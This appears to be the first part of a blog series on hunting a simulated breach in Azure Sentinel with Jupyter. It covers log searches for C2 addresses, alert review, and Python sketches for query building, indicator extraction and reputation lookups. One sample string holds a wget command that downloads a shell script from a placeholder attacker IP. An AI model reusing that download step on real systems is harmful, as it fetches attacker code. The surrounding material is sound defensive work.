This is the first part of a three-part article about using Jupyter notebooks in Azure Sentinel. In this series we will be using Jupyter and Python to trace the path of a security breach in a network. The article is accompanied by a Jupyter notebook that illustrates:
- how to query and display Azure Sentinel log data,
- how to enhance the data using external threat intelligence and other network databases (such as GeoIP),
- how to clean, filter and analyze data using the pandas and scikit-learn packages,
- how to visualize the data in tabular and graphical forms.
The notebook contains all the code used in the articles.
The Attack Scenario
We will investigate a simulated attack using Jupyter and Python to query, analyze and interpret data from Azure Sentinel.
- Part 1 starts from receipt of a threat intelligence report and looks at how to investigate the characteristics of an attacker IP address and view related alerts in Azure Sentinel.
- Part 2 will look at the attacker activity on a Linux host and at the network traffic patterns that lead us to discover a second compromised host.
- Part 3 will carry the investigation on to this secondary Windows host and the subsequent exfiltration of Office 365 documents.
The attack scenario is illustrated in the following figure.
Before getting into our hunting scenario, it is worth pausing to ask why we would want to use Jupyter notebooks with Azure Sentinel, given that it has a lot of powerful query, investigation, data manipulation and visualization capabilities of its own. One of the principal reasons that we built Azure Sentinel with a powerful query API was to support its use with external tools such as Jupyter.
If you are new to Jupyter notebooks you should review this article, which gives a more detailed description of the additional capabilities that Jupyter brings. In brief these are:
- Data persistence, repeatability and backtracking in a single shareable document
- Full scripting and programming environment
- Ability to join data from external sources (i.e. not only data stored in Azure Sentinel)
- Access to a huge array of Python libraries bringing capabilities such as machine learning and deep learning, advanced data processing and analysis, and graphing and visualization.
For more background on starting out with Azure Sentinel and Jupyter look at either of the following documents:
The Hunting Notebook
The companion notebook to this article is (intentionally) long. It is meant to be illustrative and educational rather than used as-is. For that reason, I’ve tried to leave as much code and commenting as possible in the notebook for those who want to delve under the covers. However, you don’t need to read any code to follow the blog and look at the results of the notebook. I do encourage you to keep the notebook open as you read this though – since there is a lot more data and visual content in the notebook than we can reasonably fit into a blog post.
The notebook used in this article is available here and has sample data saved with it. Viewing it with nbviewer.org (open in nbviewer) will keep the rendering as close to the original as possible and I recommend using that over the native GitHub viewer. Feel free to copy/paste sections and snippets to use in your own notebooks if you find them useful.
In part one we will look at the attacker’s first incursion into our network (step 1 on the earlier Scenario diagram) and introduce some of the components for exploring Azure Sentinel’s notebook integration.
Threat Intelligence Report
Our investigation is triggered by a Threat Intelligence report. This could be part of a threat intelligence feed that you subscribe to, a CERT advisory email, or a result of ad hoc browsing of online reports. In each case you might see something like this as part of the report.
Indicators of Compromise (courtesy FireEye)
You can see a mixture of IP Addresses, URLs and file hashes in the list – all of which might be the basis for searching your organization’s data to see if any show up. In our case we will start with a list of Command & Control (C2) IP Addresses identified in the report. The techniques shown later in the notebook are usable irrespective of your starting point. For example, it could be an unusual event identified in the Azure Sentinel Hunting Queries as shown below.
Hunting Queries in Azure Sentinel
Searching for IP Address Use
We want to know whether any of the C2 IPs have been seen in our network. Obviously, you would want to search network logs for this, but using the Kusto Query Language (KQL) search operator we can just as easily search across all our logs (this can take more time but can uncover hits in tables that we would not otherwise have checked).
We use the time-range selector to set the range for queries (using this makes it easier to change the time ranges and re-run the queries than typing in the dates each time). Here we are, somewhat artificially, searching over a single day, but searching one or more weeks would be typical.
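To make the search step concrete, here is a minimal sketch of how a cross-table query for a list of IPs might be assembled in Python before being sent to Azure Sentinel. It is not the code from the companion notebook: the function name build_ip_search_query, the placeholder IP addresses (taken from the reserved documentation ranges) and the dates are all assumptions made for illustration. The query text relies on the KQL search operator and the $table column that search adds to its output.

```python
import ipaddress
from datetime import datetime, timedelta, timezone


def build_ip_search_query(ip_addresses, start, end):
    """Return KQL text that counts rows mentioning any of the IPs, per table.

    start and end are expected to be timezone-aware datetimes.
    """
    if not ip_addresses:
        raise ValueError("at least one IP address is required")
    # Validate each value so that only real IP addresses end up in the query text.
    for ip in ip_addresses:
        ipaddress.ip_address(ip)
    # Quote each IP so that search treats it as a literal term.
    terms = " or ".join(f'"{ip}"' for ip in ip_addresses)
    # Format the bounds as UTC timestamps.
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    start_utc = start.astimezone(timezone.utc).strftime(fmt)
    end_utc = end.astimezone(timezone.utc).strftime(fmt)
    return (
        f"search {terms}\n"
        f"| where TimeGenerated between (datetime({start_utc}) .. datetime({end_utc}))\n"
        "| summarize RowCount = count() by Table = $table"
    )


# Hypothetical inputs: placeholder C2 addresses and an arbitrary one-day window.
c2_ips = ["203.0.113.10", "198.51.100.7"]
query_end = datetime(2019, 2, 15, tzinfo=timezone.utc)
query_start = query_end - timedelta(days=1)
print(build_ip_search_query(c2_ips, query_start, query_end))
```

Keeping the time bounds as parameters mirrors what the time-range widget gives us: widening the search from one day to several weeks means changing one value and re-running the cell.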
Time-Range Selector Widget
Results of C2 IP Query
We can see that one of the IP Addresses shows up in several logs besides our network log, including the Security Alerts table. This is probably the first place we should look. Hits in Syslog and Linux Audit log tables indicate that at least one of our Linux hosts knows something about this address.
A closer look at the alerts seems to confirm this.
Looking at the alerts, we can see a series of SSH brute force (Anomalous Login) alerts followed by a Suspicious File Download alert. Scrolling down the details of the alert reveals our C2 IP address being used as the source of a shell script download.
Suspicious File Download Alert
C2 IP used in wget HTTP download
The notebook makes use of a few tools from the msticpy package. This is an ongoing development project started by Microsoft security analysts to collect together tools that aid common investigation or hunting tasks (visit the GitHub repository for more details and documentation of the tools). We’ve seen a few of these used already:
- A widget to set the alert date range for the query
- Built-in query to fetch alerts for the specified time range
- AlertSelector and AlertDisplay to select and display the alert contents. The scrollbar in the alert pane lets you scroll to see all the alert properties, extended properties and entities.
In this section of the notebook you can also see the use of the IoCExtractor class to pull out useful items (like IP Addresses, hashes and URLs) from text strings or data sets.
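To give a feel for what this kind of extraction involves, the following is a simplified, standard-library sketch of pulling indicators out of free text with regular expressions. It is not msticpy's IoCExtractor and does not reproduce its interface: the function extract_iocs, the patterns and the sample command line are all assumptions for illustration, and real-world extraction needs to handle many more cases (defanged URLs, IPv6, domain names and so on).

```python
import ipaddress
import re

# Deliberately simple patterns; they will miss or over-match some real-world cases.
IPV4_CANDIDATE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"\bhttps?://[^\s\"'<>]+", re.IGNORECASE)
HEX_HASH = re.compile(r"\b[a-fA-F0-9]{32,64}\b")
HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}


def extract_iocs(text):
    """Return a dict of sets of IPv4 addresses, URLs and file hashes found in text."""
    found = {"ipv4": set(), "url": set(), "md5": set(), "sha1": set(), "sha256": set()}
    for candidate in IPV4_CANDIDATE.findall(text):
        try:
            # Reject strings such as 999.1.1.1 that only look like addresses.
            ipaddress.IPv4Address(candidate)
        except ValueError:
            continue
        found["ipv4"].add(candidate)
    found["url"].update(URL.findall(text))
    for candidate in HEX_HASH.findall(text):
        # Classify hex strings by length; other lengths are ignored.
        hash_type = HASH_TYPES.get(len(candidate))
        if hash_type:
            found[hash_type].add(candidate.lower())
    return found


# Hypothetical command line of the kind that might appear in an alert.
sample = (
    "wget http://203.0.113.10/install.sh -O /tmp/x; "
    "hash d41d8cd98f00b204e9800998ecf8427e, bad ip 999.1.1.1"
)
iocs = extract_iocs(sample)
print(iocs["ipv4"], iocs["url"], iocs["md5"])
```

Validating the IP candidates with the ipaddress module, rather than trusting the regular expression alone, keeps obviously invalid strings out of later lookups.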
A note about Entities
Entities are simple classes that define a well-known set of properties for things like hosts, processes, accounts, IP addresses, etc. Using these provides a useful abstraction from the way these items might be represented in different data sets; you’ll see these appearing in the notebook code, in other contexts in Azure Sentinel and in the alerts generated by Azure Security Center.
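As a rough illustration of the idea (and not the actual entity classes used by msticpy or Azure Sentinel), an entity can be thought of as a small class with a fixed set of properties, plus a mapping from whatever field names a given data set happens to use. The class IpEntity, the helper ip_entity_from_record and the field names below are all hypothetical.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class IpEntity:
    """A hypothetical IP address entity with a fixed, well-known set of properties."""
    address: str
    hostname: Optional[str] = None


# Hypothetical field names that different data sets might use for the same thing.
KNOWN_IP_FIELDS = ("IPAddress", "SourceIP", "src_ip")


def ip_entity_from_record(record):
    """Map a raw record (a dict) onto an IpEntity, whatever its IP field is called."""
    for field_name in KNOWN_IP_FIELDS:
        if record.get(field_name):
            return IpEntity(address=record[field_name], hostname=record.get("HostName"))
    raise KeyError("no known IP address field in record")


# Two records from differently shaped sources produce the same entity.
from_alert = ip_entity_from_record({"SourceIP": "203.0.113.10"})
from_syslog = ip_entity_from_record({"src_ip": "203.0.113.10"})
print(from_alert == from_syslog)
```

Once records are normalized this way, the rest of the investigation code can work with one representation instead of branching on the source of each row.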
When you come across a suspicious IP address (or anything suspicious) you want to find out as much about it as you can. We can do a series of checks on the IP address, for example retrieving registration information from public WhoIs databases and finding its geographic location.
Reverse IP and WhoIs lookup
Note: Since the “attacker” in this case was a server of mine, I’m ok that Microsoft seems to be the owner of this C2 address.
GeoIP Lookup and display of the original C2 IPs with our attacker IP indicated in red.
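Before sending addresses to external WhoIs or GeoIP services, it can be worth checking that they are valid, publicly routable addresses, since private or malformed values will not return anything useful. The sketch below shows one way to do that with the standard library, along with a simple reverse DNS lookup. The helper names and the candidate list are assumptions for illustration; the notebook itself uses other packages for the WhoIs and GeoIP steps.

```python
import ipaddress
import socket


def is_public_ip(ip):
    """Return True if the string is a valid, globally routable IP address."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def reverse_dns(ip):
    """Return the host name registered for an address, or None if the lookup fails."""
    try:
        host_name, _aliases, _addresses = socket.gethostbyaddr(ip)
        return host_name
    except OSError:
        return None


# Hypothetical candidates: one public address, two private ones and one invalid string.
candidates = ["8.8.8.8", "10.0.0.5", "192.168.1.20", "not-an-ip"]
to_look_up = [ip for ip in candidates if is_public_ip(ip)]
print(to_look_up)
```

Calling reverse_dns on each remaining address needs network access, so it is defined here but not run as part of the example.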
Threat Intelligence and IP Reputation Lookup
Some of the more interesting lookups that we can do include checking whether the IP Address shows up in threat intelligence and IP reputation databases.
The following shows retrieval of a threat intel indicator from our Azure Sentinel workspace (assuming that you have on-boarded Threat Intel feeds into your subscription) and a query to the VirusTotal API.
Query from Azure Sentinel Bring-your-own-threat-intel
VirusTotal Lookup
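For readers who want to try an IP reputation lookup outside the notebook, here is a minimal sketch against the public VirusTotal API. It assumes version 3 of the API (the ip_addresses endpoint, the x-apikey header and the last_analysis_stats attribute), which may differ from what the notebook uses; the function names are hypothetical, you need your own API key, and the sample response is a hand-made stand-in rather than a real result.

```python
import json
import urllib.request

# Assumption: VirusTotal API v3 endpoint for IP address reports.
VT_IP_URL = "https://www.virustotal.com/api/v3/ip_addresses/{ip}"


def build_vt_ip_request(ip, api_key):
    """Build (but do not send) the HTTP request for an IP address report."""
    return urllib.request.Request(VT_IP_URL.format(ip=ip), headers={"x-apikey": api_key})


def summarize_vt_response(body):
    """Reduce a parsed report to the counts that matter for a quick triage."""
    stats = body.get("data", {}).get("attributes", {}).get("last_analysis_stats", {})
    return {
        "malicious": stats.get("malicious", 0),
        "suspicious": stats.get("suspicious", 0),
        "engines": sum(stats.values()),
    }


def lookup_ip(ip, api_key):
    """Send the request and summarize the reply (requires network access and a key)."""
    with urllib.request.urlopen(build_vt_ip_request(ip, api_key), timeout=30) as resp:
        return summarize_vt_response(json.load(resp))


# Hand-made stand-in for a response body, for illustration only.
sample_body = {
    "data": {
        "attributes": {
            "last_analysis_stats": {
                "harmless": 60, "malicious": 3, "suspicious": 1, "undetected": 20,
            }
        }
    }
}
print(summarize_vt_response(sample_body))
```

Separating request building from response parsing makes it easy to test the parsing on saved responses without spending API quota.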
In this first part we’ve covered starting out with Azure Sentinel and using the power of Jupyter notebooks to:
- search across data stored in Azure Sentinel to identify which datasets contain the items that we’re looking for,
- view and manipulate Security Alerts and Entities,
- correlate this data with external data sources such as threat intelligence sources, GeoIP and IP registration services.
We’ve also introduced some of the Python modules in the msticpy package that you can use to speed up the development of your own notebooks and gain insights from your Azure Sentinel data more quickly and more repeatably.
In the next part we’ll continue to follow our attacker’s path on to a compromised Linux host: examining process auditing and logon sessions on the host and looking at network traffic to see where else our guest might have roamed. As part of this we’ll look at another card that Python brings to the investigative table – the ability to re-process and decode log data to pull out additional information needed for our investigation.